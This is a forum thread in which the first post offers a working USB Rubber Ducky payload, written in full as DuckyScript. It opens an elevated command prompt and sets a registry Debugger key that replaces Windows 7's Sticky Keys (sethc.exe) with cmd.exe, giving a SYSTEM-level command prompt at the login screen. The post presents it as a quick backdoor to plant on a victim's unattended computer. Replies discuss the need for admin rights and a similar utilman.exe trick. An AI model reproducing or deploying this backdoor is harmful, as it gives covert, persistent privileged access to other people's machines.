Jump to content

Allows Any Application To Run On Top Of Windows 7 Login Screen


Recommended Posts

I know that if you have physical access to a computer, it's pretty much owned. But the reason I wanted to make a rubber ducky payload of this old backdoor is that you only need a few seconds to install the backdoor. I.e when the victim leaves his/hers computer unattended without putting on screen saver with password, you put in the rubber ducky and install this payload. After this you can a) press the SHIFT key continuously for 5 times or B) Alt+Shift+PrintScreen which will open a command prompt with system privilege. Simple and cool :-) Make sure to take a backup of the original sethc.exe.

I have had some encoding issues, be sure to check out which keyboards the rubber ducky firmware supports.

I have edited the code without testing it again, but I think it still will compile and run as planned. Tune the delay parameter for your own pc. I have made the delays long enough for you to see what's happening. Enjoy.

The victims machine must have admin privileges for this to work.

REM Author: Asbjørn Reglund Thorsen <art@awaresec.no>

REM Target: Tested on Windows 7

REM Description: Replaces the "Sticky keys" on windows 7s login screen with the "command prompt" executable

REM References: http://carnal0wnage....ticky-keys.html

REM http://www.redmondpi...n-login-screen/

ESCAPE

CONTROL ESCAPE

DELAY 400

STRING cmd

DELAY 400

MENU

DELAY 400

DOWN

DELAY 400

DOWN

DELAY 1000

ENTER

DELAY 1000

LEFT

DELAY 1000

ENTER

DELAY 1000

STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"

STRING /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

DELAY 400

ENTER

REM Notes:

REM Thanks to Espen Grøndal who told me about this "feature"

REM The trick does not work when the Sticky Keys are disabled.

REM If you see the message that says “The operation completed successfully”, that means you have installed the backdoor.

REM Cleanup: You can use reg edit and browse to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" and remove the sethc.exe file.

Edited by fuzzerman
Link to post
Share on other sites

So how well does the privilege escalation works on your rubber ducky? I mean, does the victim still require to be logged in as administrator for this work?

Link to post
Share on other sites

So how well does the privilege escalation works on your rubber ducky? I mean, does the victim still require to be logged in as administrator for this work?

Anyway victim should be, it does not depend on Rubber Ducky, as this is only HID device like keyboard.

If current user does not have admin privileges (not included in Administrators group) you will never run any program with administrator rights,

as administator password will be requested (MENU -> DOWN -> DOWN -> ENTER -> LEFT -> ENTER)

Link to post
Share on other sites

I did something like this already but with the Utility Manager (utilman.exe)... It's a clever way of owning a box, but there are some stability issues when you start running certain programs (such as those that need user directories)..

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...